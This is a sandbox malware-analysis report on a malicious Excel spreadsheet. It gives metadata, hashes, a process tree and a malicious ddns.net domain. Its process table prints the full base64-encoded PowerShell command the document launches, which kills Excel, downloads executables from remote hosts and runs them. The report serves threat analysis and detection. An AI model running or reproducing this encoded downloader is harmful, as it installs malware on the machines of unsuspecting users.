File name: | 3d688c754fca8be157a3d86745a3676d93bb1ebc00e13be9c679c2e95361aa8f.xls |
Full analysis: | https://app.any.run/tasks/1de79f59-8f46-4fd2-a163-4f336ad325a2 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 02:37:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Packard bell, Last Saved By: Packard bell, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Mar 20 06:12:42 2019, Last Saved Time/Date: Wed Mar 20 06:12:44 2019, Security: 0 |
MD5: | CB3CE07BDBF4BC05A56E7459CBC98214 |
SHA1: | ABDA5915F4982DEB8DB1FAE311E0F9D9695BC6DC |
SHA256: | 3D688C754FCA8BE157A3D86745A3676D93BB1EBC00E13BE9C679C2E95361AA8F |
SSDEEP: | 1536:ek3hOdsylKlgryzc4bNhZFGzE+cL2knAfiC2AuT4P8cnUHrzJnSbLubS:ek3hOdsylKlgryzc4bNhZFGzE+cL2kna |
.xls | | | Microsoft Excel sheet (36.8) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (30) |
.doc | | | Microsoft Word document (old ver.) (23.3) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 31 |
HeadingPairs: |
|
TitleOfParts: | Sheet1 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:03:20 06:12:44 |
CreateDate: | 2019:03:20 06:12:42 |
Software: | Microsoft Excel |
LastModifiedBy: | Packard bell |
Author: | Packard bell |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1524 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 4294967295 Version: 14.0.6024.1000 | ||||
2512 | "C:\Windows\System32\cmd.exe" & /C POwERSHeLl -E ZgB1AG4AYwB0AGkAbwBuACAAbgBPAHYAZQAyADUAagAxAHEAUwB1AEUAdgBmAGkAYgAzAEIATgBLAFcAMQB5AFQANQBDAHUATQAgACgAIAAkAGEAcABfAFUAVABLAE4AdQA5AHAAOABfAEwARQBsAEsATABNAE0AZgBOADYAcgBiAFMAdAAgACwAIAAkAFQAdgBaAGEAaQB4AEgAVgBZAEEATgBZAHQAagBQAHcAYgBMAEQATgA5AFAATQBsAEYAcAB4AE4AOAAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAGEAcABfAFUAVABLAE4AdQA5AHAAOABfAEwARQBsAEsATABNAE0AZgBOADYAcgBiAFMAdAAgACwAIAAkAFQAdgBaAGEAaQB4AEgAVgBZAEEATgBZAHQAagBQAHcAYgBMAEQATgA5AFAATQBsAEYAcAB4AE4AOAAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABUAHYAWgBhAGkAeABIAFYAWQBBAE4AWQB0AGoAUAB3AGIATABEAE4AOQBQAE0AbABGAHAAeABOADgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAFcATgAzAEsAeABQAE8AWQBMADMAVgBZAEwATgA5AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAZQA3AEgANABvAGUAegBDAE0AUwB0ADYAawBXADkAQQA4AHgALgBlAHgAZQAnADsADQAKAG4ATwB2AGUAMgA1AGoAMQBxAFMAdQBFAHYAZgBpAGIAMwBCAE4ASwBXADEAeQBUADUAQwB1AE0AIAAnAGgAdAB0AHAAOgAvAC8AagBhAGsAcABhAHMAcQB1AHIAZAAuAGQAZABuAHMALgBuAGUAdAAvAGIAaQBuAC8AQgA1ADkAQQBCAEEARgAuAGUAeABlACcAIAAkAFcATgAzAEsAeABQAE8AWQBMADMAVgBZAEwATgA5ADsADQAKACQAZwBBAEYAcABoAFoAOAB5AGsATwBKAG4AWgBKAGIAUwBMAHMANAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcAHUAVQBpAHEALgBlAHgAZQAnADsADQAKAG4ATwB2AGUAMgA1AGoAMQBxAFMAdQBFAHYAZgBpAGIAMwBCAE4ASwBXADEAeQBUADUAQwB1AE0AIAAnAGgAdAB0AHAAOgAvAC8AawBlAG4AbgBpAGUAcwBiAGwAYQBjAGsALgBkAGQAbgBzAC4AbgBlAHQALwBmAGkAbABlAC8AcwB0AGEAeQAuAGUAeABlACcAIAAkAGcAQQBGAHAAaABaADgAeQBrAE8ASgBuAFoASgBiAFMATABzADQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3100 | POwERSHeLl -E ZgB1AG4AYwB0AGkAbwBuACAAbgBPAHYAZQAyADUAagAxAHEAUwB1AEUAdgBmAGkAYgAzAEIATgBLAFcAMQB5AFQANQBDAHUATQAgACgAIAAkAGEAcABfAFUAVABLAE4AdQA5AHAAOABfAEwARQBsAEsATABNAE0AZgBOADYAcgBiAFMAdAAgACwAIAAkAFQAdgBaAGEAaQB4AEgAVgBZAEEATgBZAHQAagBQAHcAYgBMAEQATgA5AFAATQBsAEYAcAB4AE4AOAAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAGEAcABfAFUAVABLAE4AdQA5AHAAOABfAEwARQBsAEsATABNAE0AZgBOADYAcgBiAFMAdAAgACwAIAAkAFQAdgBaAGEAaQB4AEgAVgBZAEEATgBZAHQAagBQAHcAYgBMAEQATgA5AFAATQBsAEYAcAB4AE4AOAAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABUAHYAWgBhAGkAeABIAFYAWQBBAE4AWQB0AGoAUAB3AGIATABEAE4AOQBQAE0AbABGAHAAeABOADgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAFcATgAzAEsAeABQAE8AWQBMADMAVgBZAEwATgA5AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAZQA3AEgANABvAGUAegBDAE0AUwB0ADYAawBXADkAQQA4AHgALgBlAHgAZQAnADsADQAKAG4ATwB2AGUAMgA1AGoAMQBxAFMAdQBFAHYAZgBpAGIAMwBCAE4ASwBXADEAeQBUADUAQwB1AE0AIAAnAGgAdAB0AHAAOgAvAC8AagBhAGsAcABhAHMAcQB1AHIAZAAuAGQAZABuAHMALgBuAGUAdAAvAGIAaQBuAC8AQgA1ADkAQQBCAEEARgAuAGUAeABlACcAIAAkAFcATgAzAEsAeABQAE8AWQBMADMAVgBZAEwATgA5ADsADQAKACQAZwBBAEYAcABoAFoAOAB5AGsATwBKAG4AWgBKAGIAUwBMAHMANAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcAHUAVQBpAHEALgBlAHgAZQAnADsADQAKAG4ATwB2AGUAMgA1AGoAMQBxAFMAdQBFAHYAZgBpAGIAMwBCAE4ASwBXADEAeQBUADUAQwB1AE0AIAAnAGgAdAB0AHAAOgAvAC8AawBlAG4AbgBpAGUAcwBiAGwAYQBjAGsALgBkAGQAbgBzAC4AbgBlAHQALwBmAGkAbABlAC8AcwB0AGEAeQAuAGUAeABlACcAIAAkAGcAQQBGAHAAaABaADgAeQBrAE8ASgBuAFoASgBiAFMATABzADQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1524 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8880.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3100 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HI8HGS94994AUDEV558E.temp | — | |
MD5:— | SHA256:— | |||
1524 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF3FA9C618EC5C8250.TMP | — | |
MD5:— | SHA256:— | |||
3100 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf914a.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1524 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF184E950BB3E3A528.TMP | document | |
MD5:3EF141875EFDF6A86D8C40184A126AA0 | SHA256:DD07AA7178FA61B674131CF4B084CEBBD9C3F22E429EBF984064A76CFE13A741 | |||
3100 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
Domain | IP | Reputation |
---|---|---|
jakpasqurd.ddns.net |
| malicious |